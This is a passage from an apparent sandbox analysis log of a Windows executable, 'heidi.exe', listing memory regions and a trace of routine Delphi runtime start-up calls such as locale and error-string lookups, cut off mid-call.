"private_0x00000000003f0000" filename = "" Region: id = 1028 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 1029 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 1030 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 1031 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 1032 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 1033 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 1034 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 1035 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 1036 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 1037 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 1038 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 1039 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 1040 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 1041 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 1042 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 1043 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 1044 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 1045 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 1046 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 1047 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 1048 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 1049 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 1050 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 1051 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 1052 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 1053 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 1054 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 1055 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 1056 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 1057 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 1058 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 1059 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 1060 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 1061 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 1062 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 1063 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 1064 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 1065 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 1066 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 1067 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 1068 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 1069 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 1070 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 1071 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 1072 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 1073 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 1074 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 1075 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 1076 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 1077 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 1078 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 1079 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 1080 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 1081 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 1082 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 1083 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 1084 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 1085 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 1086 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 1087 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 1088 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 1089 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 1090 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 1091 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 1092 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 1093 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 1094 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 1095 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 1096 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 1097 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 1098 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 1099 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 1100 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 1101 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 1102 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 1103 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 1104 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 1105 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 1106 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 1107 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 1108 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 1109 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 1110 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 1111 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 1112 start_va = 0x1c50000 end_va = 0x1c69fff entry_point = 0x0 region_type = private name = "private_0x0000000001c50000" filename = "" Region: id = 1129 start_va = 0x1ed0000 end_va = 0x1f71fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ed0000" filename = "" Region: id = 1132 start_va = 0x1c70000 end_va = 0x1c70fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c70000" filename = "" Thread: id = 46 os_tid = 0xa40 [0123.717] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0123.717] GetKeyboardType (nTypeFlag=0) returned 4 [0123.717] GetCommandLineA () returned="\"C:\\Users\\kFT6uTQW\\AppData\\Local\\Temp\\heidi.exe\" " [0123.717] GetStartupInfoA (in: lpStartupInfo=0x18fefc | out: lpStartupInfo=0x18fefc*(cb=0x44, lpReserved="", lpDesktop="Winsta0\\Default", lpTitle="C:\\Users\\kFT6uTQW\\AppData\\Local\\Temp\\heidi.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0123.717] GetVersion () returned 0x1db10106 [0123.717] GetVersion () returned 0x1db10106 [0123.717] GetCurrentThreadId () returned 0xa40 [0123.717] GetModuleFileNameA (in: hModule=0x400000, lpFilename=0x18f9f8, nSize=0x105 | out: lpFilename="C:\\Users\\kFT6uTQW\\AppData\\Local\\Temp\\heidi.exe" (normalized: "c:\\users\\kft6utqw\\appdata\\local\\temp\\heidi.exe")) returned 0x2e [0123.717] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x18f8d3, nSize=0x105 | out: lpFilename="C:\\Users\\kFT6uTQW\\AppData\\Local\\Temp\\heidi.exe" (normalized: "c:\\users\\kft6utqw\\appdata\\local\\temp\\heidi.exe")) returned 0x2e [0123.717] RegOpenKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x18f9e8 | out: phkResult=0x18f9e8*=0x0) returned 0x2 [0123.718] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Borland\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x18f9e8 | out: phkResult=0x18f9e8*=0x0) returned 0x2 [0123.718] RegOpenKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Delphi\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x18f9e8 | out: phkResult=0x18f9e8*=0x0) returned 0x2 [0123.718] lstrcpynA (in: lpString1=0x18f8d3, lpString2="C:\\Users\\kFT6uTQW\\AppData\\Local\\Temp\\heidi.exe", iMaxLength=261 | out: lpString1="C:\\Users\\kFT6uTQW\\AppData\\Local\\Temp\\heidi.exe") returned="C:\\Users\\kFT6uTQW\\AppData\\Local\\Temp\\heidi.exe" [0123.718] GetThreadLocale () returned 0x409 [0123.718] GetLocaleInfoA (in: Locale=0x409, LCType=0x3, lpLCData=0x18f9e3, cchData=5 | out: lpLCData="ENU") returned 4 [0123.718] lstrlenA (lpString="C:\\Users\\kFT6uTQW\\AppData\\Local\\Temp\\heidi.exe") returned 46 [0123.718] lstrcpynA (in: lpString1=0x18f8fe, lpString2="ENU", iMaxLength=218 | out: lpString1="ENU") returned="ENU" [0123.718] LoadLibraryExA (lpLibFileName="C:\\Users\\kFT6uTQW\\AppData\\Local\\Temp\\heidi.ENU", hFile=0x0, dwFlags=0x2) returned 0x0 [0123.718] lstrcpynA (in: lpString1=0x18f8fe, lpString2="EN", iMaxLength=218 | out: lpString1="EN") returned="EN" [0123.719] LoadLibraryExA (lpLibFileName="C:\\Users\\kFT6uTQW\\AppData\\Local\\Temp\\heidi.EN", hFile=0x0, dwFlags=0x2) returned 0x0 [0123.719] LoadStringA (in: hInstance=0x400000, uID=0xffc6, lpBuffer=0x18fb1c, cchBufferMax=1024 | out: lpBuffer="Exception in safecall method") returned 0x1c [0123.719] LocalAlloc (uFlags=0x0, uBytes=0xff8) returned 0x294b78 [0123.719] VirtualAlloc (lpAddress=0x0, dwSize=0x100000, flAllocationType=0x2000, flProtect=0x1) returned 0x1cf0000 [0123.719] LocalAlloc (uFlags=0x0, uBytes=0x644) returned 0x295b78 [0123.720] VirtualAlloc (lpAddress=0x1cf0000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x1cf0000 [0123.720] LoadStringA (in: hInstance=0x400000, uID=0xffc5, lpBuffer=0x18fb1c, cchBufferMax=1024 | out: lpBuffer="Interface not supported") returned 0x17 [0123.720] LoadStringA (in: hInstance=0x400000, uID=0xffc3, lpBuffer=0x18fb1c, cchBufferMax=1024 | out: lpBuffer="External exception %x") returned 0x15 [0123.720] LoadStringA (in: hInstance=0x400000, uID=0xffc4, lpBuffer=0x18fb1c, cchBufferMax=1024 | out: lpBuffer="Assertion failed") returned 0x10 [0123.720] LoadStringA (in: hInstance=0x400000, uID=0xffd3, lpBuffer=0x18fb1c, cchBufferMax=1024 | out: lpBuffer="Variant or safe array index out of bounds") returned 0x29 [0123.720] LoadStringA (in: hInstance=0x400000, uID=0xffdf, lpBuffer=0x18fb1c, cchBufferMax=1024 | out: lpBuffer="Invalid argument") returned 0x10 [0123.720] LoadStringA (in: hInstance=0x400000, uID=0xffd2, lpBuffer=0x18fb1c, cchBufferMax=1024 | out: lpBuffer="Error creating variant or safe array") returned 0x24 [0123.720] LoadStringA (in: hInstance=0x400000, uID=0xffef, lpBuffer=0x18fb1c, cchBufferMax=1024 | out: lpBuffer="Variant method calls not supported") returned 0x22 [0123.720] LoadStringA (in: hInstance=0x400000, uID=0xffd6, lpBuffer=0x18fb1c, cchBufferMax=1024 | out: lpBuffer="Invalid variant operation") returned 0x19 [0123.720] LoadStringA (in: hInstance=0x400000, uID=0xffd5, lpBuffer=0x18fb1c, cchBufferMax=1024 | out: lpBuffer="Invalid variant type conversion") returned 0x1f [0123.720] LoadStringA (in: hInstance=0x400000, uID=0xffe8, lpBuffer=0x18fb1c, cchBufferMax=1024 | out: lpBuffer="Stack overflow") returned 0xe [0123.720] LoadStringA (in: hInstance=0x400000, uID=0xffe9, lpBuffer=0x18fb1c, cchBufferMax=1024 | out: lpBuffer="Control-C hit") returned 0xd [0123.720] LoadStringA (in: hInstance=0x400000, uID=0xffea, lpBuffer=0x18fb1c, cchBufferMax=1024 | out: lpBuffer="Privileged instruction") returned 0x16 [0123.720] LoadStringA (in: hInstance=0x400000, uID=0xffe7, lpBuffer=0x18fb1c, cchBufferMax=1024 | out: lpBuffer="Access violation") returned 0x10 [0123.720] LoadStringA (in: hInstance=0x400000, uID=0xffe5, lpBuffer=0x18fb1c, cchBufferMax=1024 | out: lpBuffer="Invalid class typecast") returned 0x16 [0123.720] LoadStringA (in: hInstance=0x400000, uID=0xffe3, lpBuffer=0x18fb1c, cchBufferMax=1024 | out: lpBuffer="Floating point underflow") returned 0x18 [0123.720] LoadStringA (in: hInstance=0x400000, uID=0xffe2, lpBuffer=0x18fb1c, cchBufferMax=1024 | out: lpBuffer="Floating point overflow") returned 0x17 [0123.720] LoadStringA (in: hInstance=0x400000, uID=0xffe1, lpBuffer=0x18fb1c, cchBufferMax=1024 | out: lpBuffer="Floating point division by zero") returned 0x1f [0123.720] LoadStringA (in: hInstance=0x400000, uID=0xffe0, lpBuffer=0x18fb1c, cchBufferMax=1024 | out: lpBuffer="Invalid floating point operation") returned 0x20 [0123.720] LoadStringA (in: hInstance=0x400000, uID=0xffff, lpBuffer=0x18fb1c, cchBufferMax=1024 | out: lpBuffer="Integer overflow") returned 0x10 [0123.720] LoadStringA (in: hInstance=0x400000, uID=0xfffe, lpBuffer=0x18fb1c, cchBufferMax=1024 | out: lpBuffer="Range check error") returned 0x11 [0123.720] LoadStringA (in: hInstance=0x400000, uID=0xfffd, lpBuffer=0x18fb1c, cchBufferMax=1024 | out: lpBuffer="Division by zero") returned 0x10 [0123.720] LoadStringA (in: hInstance=0x400000, uID=0xfffc, lpBuffer=0x18fb1c, cchBufferMax=1024 | out: lpBuffer="Invalid numeric input") returned 0x15 [0123.720] LoadStringA (in: hInstance=0x400000, uID=0xfffb, lpBuffer=0x18fb1c, cchBufferMax=1024 | out: lpBuffer="Disk full") returned 0x9 [0123.720] LoadStringA (in: hInstance=0x400000, uID=0xfffa, lpBuffer=0x18fb1c, cchBufferMax=1024 | out: lpBuffer="Read beyond end of file") returned 0x17 [0123.720] LoadStringA (in: hInstance=0x400000, uID=0xfff9, lpBuffer=0x18fb1c, cchBufferMax=1024 | out: lpBuffer="File access denied") returned 0x12 [0123.720] LoadStringA (in: hInstance=0x400000, uID=0xfff8, lpBuffer=0x18fb1c, cchBufferMax=1024 | out: lpBuffer="Too many open files") returned 0x13 [0123.720] LoadStringA (in: hInstance=0x400000, uID=0xfff7, lpBuffer=0x18fb1c, cchBufferMax=1024 | out: lpBuffer="Invalid filename") returned 0x10 [0123.720] LoadStringA (in: hInstance=0x400000, uID=0xfff6, lpBuffer=0x18fb1c, cchBufferMax=1024 | out: lpBuffer="File not found") returned 0xe [0123.721] LoadStringA (in: hInstance=0x400000, uID=0xfff4, lpBuffer=0x18fb08, cchBufferMax=1024 | out: lpBuffer="Out of memory") returned 0xd [0123.721] LoadStringA (in: hInstance=0x400000, uID=0xffe4, lpBuffer=0x18fb08, cchBufferMax=1024 | out: lpBuffer="Invalid pointer operation") returned 0x19 [0123.721] GetVersionExA (in: lpVersionInformation=0x18fea0*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x18fea0*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0123.721] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76df0000 [0123.721] GetProcAddress (hModule=0x76df0000, lpProcName="GetDiskFreeSpaceExA") returned 0x76e8434f [0123.721] GetThreadLocale () returned 0x409 [0123.721] GetThreadLocale () returned 0x409 [0123.721] GetLocaleInfoA (in: Locale=0x409, LCType=0x44, lpLCData=0x18fd78, cchData=256 | out: lpLCData="Jan") returned 4 [0123.721] GetLocaleInfoA (in: Locale=0x409, LCType=0x38, lpLCData=0x18fd78, cchData=256 | out: lpLCData="January") returned 8 [0123.721] GetLocaleInfoA (in: Locale=0x409, LCType=0x45, lpLCData=0x18fd78, cchData=256 | out: lpLCData="Feb") returned 4 [0123.721] GetLocaleInfoA (in: Locale=0x409, LCType=0x39, lpLCData=0x18fd78, cchData=256 | out: lpLCData="February") returned 9 [0123.721] GetLocaleInfoA (in: Locale=0x409, LCType=0x46, lpLCData=0x18fd78, cchData=256 | out: lpLCData="Mar") returned 4 [0123.721] GetLocaleInfoA (in: Locale=0x409, LCType=0x3a, lpLCData=0x18fd78, cchData=256 | out: lpLCData="March") returned 6 [0123.721] GetLocaleInfoA (in: Locale=0x409, LCType=0x47, lpLCData=0x18fd78, cchData=256 | out: lpLCData="Apr") returned 4 [0123.721] GetLocaleInfoA (in: Locale=0x409, LCType=0x3b, lpLCData=0x18fd78, cchData=256 | out: lpLCData="April") returned 6 [0123.721] GetLocaleInfoA (in: Locale=0x409, LCType=0x48, lpLCData=0x18fd78, cchData=256 | out: lpLCData="May") returned 4 [0123.721] GetLocaleInfoA (in: Locale=0x409, LCType=0x3c, lpLCData=0x18fd78, cchData=256 | out: lpLCData="May") returned 4 [0123.721] GetLocaleInfoA (in: Locale=0x409, LCType=0x49, lpLCData=0x18fd78, cchData=256 | out: lpLCData="Jun") returned 4 [0123.721] GetLocaleInfoA (in: Locale=0x409, LCType=0x3d, lpLCData=0x18fd78, cchData=256 | out: lpLCData="June") returned 5 [0123.721] GetLocaleInfoA (in: Locale=0x409, LCType=0x4a, lpLCData=0x18fd78, cchData=256 | out: lpLCData="Jul") returned 4 [0123.721] GetLocaleInfoA (in: Locale=0x409, LCType=0x3e, lpLCData=0x18fd78, cchData=256 | out: lpLCData="July") returned 5 [0123.721] GetLocaleInfoA (in: Locale=0x409, LCType=0x4b, lpLCData=0x18fd78, cchData=256 | out: lpLCData="Aug") returned 4 [0123.721] GetLocaleInfoA (in: Locale=0x409, LCType=0x3f, lpLCData=0x18fd78, cchData=256 | out: lpLCData="August") returned 7 [0123.721] GetLocaleInfoA (in: Locale=0x409, LCType=0x4c, lpLCData=0x18fd78, cchData=256 | out: lpLCData="Sep") returned 4 [0123.721] GetLocaleInfoA (in: Locale=0x409, LCType=0x40, lpLCData=0x18fd78, cchData=256 | out: lpLCData="September") returned 10 [0123.721] GetLocaleInfoA (in: Locale=0x409, LCType=0x4d, lpLCData=0x18fd78, cchData=256 | out: lpLCData="Oct") returned 4 [0123.721] GetLocaleInfoA (in: Locale=0x409, LCType=0x41, lpLCData=0x18fd78, cchData=256 | out: lpLCData="October") returned 8 [0123.721] GetLocaleInfoA (in: Locale=0x409, LCType=0x4e, lpLCData=0x18fd78, cchData=256 | out: lpLCData="Nov") returned 4 [0123.721] GetLocaleInfoA (in: Locale=0x409, LCType=0x42, lpLCData=0x18fd78, cchData=256 | out: lpLCData="November") returned 9 [0123.721] GetLocaleInfoA (in: Locale=0x409, LCType=0x4f, lpLCData=0x18fd78, cchData=256 | out: lpLCData="Dec") returned 4 [0123.721] GetLocaleInfoA (in: Locale=0x409, LCType=0x43, lpLCData=0x18fd78, cchData=256 | out: lpLCData="December") returned 9 [0123.721] GetLocaleInfoA (in: Locale=0x409, LCType=0x37, lpLCData=0x18fd78, cchData=256 | out: lpLCData="Sun") returned 4 [0123.721] GetLocaleInfoA (in: Locale=0x409, LCType=0x30, lpLCData=0x18fd78, cchData=256 | out: lpLCData="Sunday") returned 7 [0123.721] GetLocaleInfoA (in: Locale=0x409, LCType=0x31, lpLCData=0x18fd78, cchData=256 | out: lpLCData="Mon") returned 4 [0123.721] GetLocaleInfoA (in: Locale=0x409, LCType=0x2a, lpLCData=0x18fd78, cchData=256 | out: lpLCData="Monday") returned 7 [0123.721] GetLocaleInfoA (in: Locale=0x409, LCType=0x32, lpLCData=0x18fd78, cchData=256 | out: lpLCData="Tue") returned 4 [0123.721] GetLocaleInfoA (in: Locale=0x409, LCType=0x2b, lpLCData=0x18fd78, cchData=256 | out: lpLCData="Tuesday") returned 8 [0123.721] GetLocaleInfoA (in: Locale=0x409, LCType=0x33, lpLCData=0x18fd78, cchData=256 | out: lpLCData="Wed") returned 4 [0123.721] GetLocaleInfoA (in: Locale=0x409, LCType=0x2c, lpLCData=0x18fd78, cchData=256 | out: lpLCData="Wednesday") returned 10 [0123.721] GetLocaleInfoA (in: Locale=0x409, LCType=0x34, lpLCData=0x18fd78, cchData=256 | out: lpLCData="Thu") returned 4 [0123.721] GetLocaleInfoA (in: Locale=0x409, LCType=0x2d, lpLCData=0x18fd78, cchData=256 | out: lpLCData="Thursday") returned 9 [0123.721] GetLocaleInfoA (in: Locale=0x409, LCType=0x35, lpLCData=0x18fd78, cchData=256 | out: lpLCData="Fri") returned 4 [0123.721] GetLocaleInfoA (in: Locale=0x409, LCType=0x2e, lpLCData=0x18fd78, cchData=256 | out: lpLCData="Friday") returned 7 [0123.721] GetLocaleInfoA (in: Locale=0x409, LCType=0x36, lpLCData=0x18fd78, cchData=256 | out: lpLCData="Sat") returned 4 [0123.721] GetLocaleInfoA (in: Locale=0x409, LCType=0x2f, lpLCData=0x18fd78, cchData=256 | out: lpLCData="Saturday") returned 9 [0123.721] GetThreadLocale () returned 0x409 [0123.721] GetLocaleInfoA (in: Locale=0x409, LCType=0x14, lpLCData=0x18fdd4, cchData=256 | out: lpLCData="$") returned 2 [0123.721] GetLocaleInfoA (in: Locale=0x409, LCType=0x1b, lpLCData=0x18fdd4, cchData=256 | out: lpLCData="0") returned 2 [0123.722] GetLocaleInfoA (in: Locale=0x409, LCType=0x1c, lpLCData=0x18fdd4, cchData=256 | out: lpLCData="0") returned 2 [0123.722] GetLocaleInfoA (in: Locale=0x409, LCType=0xf, lpLCData=0x18fecc, cchData=2 | out: lpLCData=",") returned 2 [0123.722] GetLocaleInfoA (in: Locale=0x409, LCType=0xe, lpLCData=0x18fecc, cchData=2 | out: lpLCData=".") returned 2 [0123.722] GetLocaleInfoA (in: Locale=0x409, LCType=0x19, lpLCData=0x18fdd4, cchData=256 | out: lpLCData="2") returned 2 [0123.722] GetLocaleInfoA (in: Locale=0x409, LCType=0x1d, lpLCData=0x18fecc, cchData=2 | out: lpLCData="/") returned 2 [0123.722] GetLocaleInfoA (in: Locale=0x409, LCType=0x1f, lpLCData=0x18fdd4, cchData=256 | out: lpLCData="M/d/yyyy") returned 9 [0123.722] GetThreadLocale () returned 0x409 [0123.722] GetLocaleInfoA (in: Locale=0x409, LCType=0x1009, lpLCData=0x18fda0, cchData=256 | out: lpLCData="1") returned 2 [0123.722] GetLocaleInfoA (in: Locale=0x409, LCType=0x20, lpLCData=0x18fdd4, cchData=256 | out: lpLCData="dddd, MMMM dd, yyyy") returned 20 [0123.722] GetThreadLocale () returned 0x409 [0123.722] GetLocaleInfoA (in: Locale=0x409, LCType=0x1009, lpLCData=0x18fda0, cchData=256 | out: lpLCData="1") returned 2 [0123.722] GetLocaleInfoA (in: Locale=0x409, LCType=0x1e, lpLCData=0x18fecc, cchData=2 | out: lpLCData=":") returned 2 [0123.722] GetLocaleInfoA (in: Locale=0x409, LCType=0x28, lpLCData=0x18fdd4, cchData=256 | out: lpLCData="AM") returned 3 [0123.722] GetLocaleInfoA (in: Locale=0x409, LCType=0x29, lpLCData=0x18fdd4, cchData=256 | out: lpLCData="PM") returned 3 [0123.722] GetLocaleInfoA (in: Locale=0x409, LCType=0x25, lpLCData=0x18fdd4, cchData=256 | out: lpLCData="0") returned 2 [0123.722] GetLocaleInfoA (in: Locale=0x409, LCType=0x23, lpLCData=0x18fdd4, cchData=256 | out: lpLCData="0") returned 2 [0123.722] GetLocaleInfoA (in: Locale=0x409, LCType=0x1005, lpLCData=0x18fdd4, cchData=256 | out: lpLCData="0") returned 2 [0123.722] GetLocaleInfoA (in: Locale=0x409, LCType=0xc, 